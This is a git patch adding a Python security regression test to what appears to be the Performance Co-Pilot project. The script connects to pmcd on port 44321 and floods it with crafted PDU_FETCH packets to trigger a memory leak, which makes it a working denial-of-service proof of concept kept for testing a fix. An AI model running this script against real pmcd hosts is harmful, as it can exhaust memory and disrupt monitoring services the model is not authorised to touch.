From 47e6e7c84f008a53061e661f31ae96629bc694ef Mon Sep 17 00:00:00 2001
From: Igor Pashev <pashev.igor@gmail.com>
Date: Sun, 26 Oct 2014 12:33:50 +0400
Subject: Debian 3.9.10

---
 qa/secure/leak-fetch | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100755 qa/secure/leak-fetch

(limited to 'qa/secure/leak-fetch')

diff --git a/qa/secure/leak-fetch b/qa/secure/leak-fetch
new file mode 100755
index 0000000..c25e1cc
--- /dev/null
+++ b/qa/secure/leak-fetch
@@ -0,0 +1,19 @@
+#
+# usage: python leak-fetch HOST
+#
+# Connects to pmcd on HOST and sends a crafted PDU_FETCH packet which triggers a memory leak.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+import pcppdu
+_, host, count = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+pcppdu.client_handshake(sock, from_=1)
+iterations = int(count)
+for i in range(iterations):
+    pcppdu.send_fetch(sock, from_=1, ctxnum=1, pmidlist=(1,) * 10000)
+    pcppdu.read_pdu(sock)
+sock.close()
-- 
cgit v1.2.3